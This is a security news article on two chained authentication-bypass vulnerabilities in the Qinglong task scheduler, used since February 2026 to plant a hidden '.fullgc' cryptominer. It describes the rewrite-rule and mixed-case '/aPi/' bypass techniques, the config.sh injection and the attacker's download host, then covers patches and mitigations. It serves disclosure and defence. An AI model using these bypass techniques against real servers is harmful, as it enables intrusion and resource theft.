Attackers are chaining two critical vulnerabilities in the popular Qinglong task scheduler to deploy cryptominers on developer servers, with exploitation occurring before the flaws were publicly disclosed.
Security researchers have discovered a concerning trend where attackers are exploiting two critical vulnerabilities in the Qinglong open-source task scheduling tool to deploy cryptominers on developer servers. The exploitation campaign began in early February 2026, before the security issues were publicly disclosed at the end of that month, according to researchers at cloud-native application security company Snyk.
What is Qinglong?
Qinglong is a self-hosted open-source time management platform that has gained significant popularity among Chinese developers. The project has been forked more than 3,200 times and boasts over 19,000 stars on GitHub, indicating its widespread adoption in developer communities. Its functionality makes it an attractive target for attackers seeking to compromise developer workstations and servers.
The Vulnerabilities
The security issues impact Qinglong versions 2.20.1 and older and can be chained together to achieve remote code execution:
CVE-2026-3965: A misconfigured rewrite rule maps '/open/' requests to '/api/', unintentionally exposing protected admin endpoints through an unauthenticated path. This creates a bypass that allows attackers to access sensitive API endpoints without proper authentication.
CVE-2026-4047: The authentication check treats paths as case-sensitive (/api/), while the router matches them case-insensitively. This allows requests like '/aPi/...' to bypass authentication and reach protected endpoints that should otherwise be secured.
The root cause in both flaws is a mismatch between middleware authorization logic and Express.js routing behavior. "Both vulnerabilities stem from a mismatch between the security middleware's assumptions and the framework's behavior," Snyk researchers explain. "The auth layer assumed certain URL patterns would always be handled one way, while Express.js treated them differently."
The Exploitation Campaign
Snyk reports that attackers have been targeting these two flaws on publicly exposed Qinglong panels to deploy cryptominers since February 7, 2026. This activity was first spotted by Qinglong users, who reported about a rogue hidden process named '.fullgc' utilizing between 85% and 100% of their CPU power. The name deliberately mimics "Full GC," an innocuous but resource-intensive process, to evade detection.
According to Snyk's analysis, the attackers exploited the flaws to modify Qinglong's config.sh and injected shell commands that downloaded a miner to '/ql/data/db/.fullgc,' and executed it in the background. The remote resource located at 'file.551911.xyz' hosted multiple variants of the binary, including for Linux x86_64, ARM64, and macOS, demonstrating the attackers' preparation for different environments.
Timeline of Events
The attacks continued with multiple confirmed infections across various setups, including those behind Nginx and SSL proxies, indicating that the attackers were adapting their methods to bypass common security measures. Meanwhile, the Qinglong maintainers only responded to the situation on March 1, 2026.
The maintainer acknowledged the vulnerability and urged users to install the latest update. However, the mitigation in pull release #2924 focused on blocking command injection patterns, which Snyk researchers determined was insufficient to address the underlying authentication bypass issues.
The effective fix came in PR #2941, which corrected the authentication bypass in the middleware by properly aligning the security checks with Express.js routing behavior. This fix addresses the root cause of both vulnerabilities rather than just attempting to block specific attack patterns.
Impact and Mitigation
The exploitation of these vulnerabilities represents a significant threat to developers who use Qinglong for task scheduling. The cryptominer deployment not only consumes valuable system resources but can also lead to longer-term security implications, as compromised systems may be used as entry points for further attacks or as part of botnets.
For users running Qinglong versions 2.20.1 or older, the immediate action should be to upgrade to the latest patched version. The official Qinglong GitHub repository contains the necessary updates and information about the fixes. Additionally, users should:
- Review their systems for any signs of compromise, particularly looking for the '.fullgc' process
- Check for unauthorized modifications to configuration files
- Monitor CPU usage for unexpected spikes
- Consider implementing network segmentation to limit the potential impact of a compromise
- Audit all scripts and processes running on their Qinglong installation
The incident highlights the importance of proper input validation, consistent authentication checks, and thorough testing of security controls in web applications. The mismatch between middleware assumptions and framework behavior is a common pitfall in web development that can lead to serious security vulnerabilities.
For organizations running Qinglong in production environments, this incident serves as a reminder of the importance of regular security assessments, prompt patching, and monitoring for unusual activity that might indicate a compromise.
The Qinglong project's GitHub repository contains detailed information about the vulnerabilities and the fixes applied. Developers are encouraged to review the security announcements and update their installations promptly to protect against ongoing exploitation attempts.
Comments
Please log in or register to join the discussion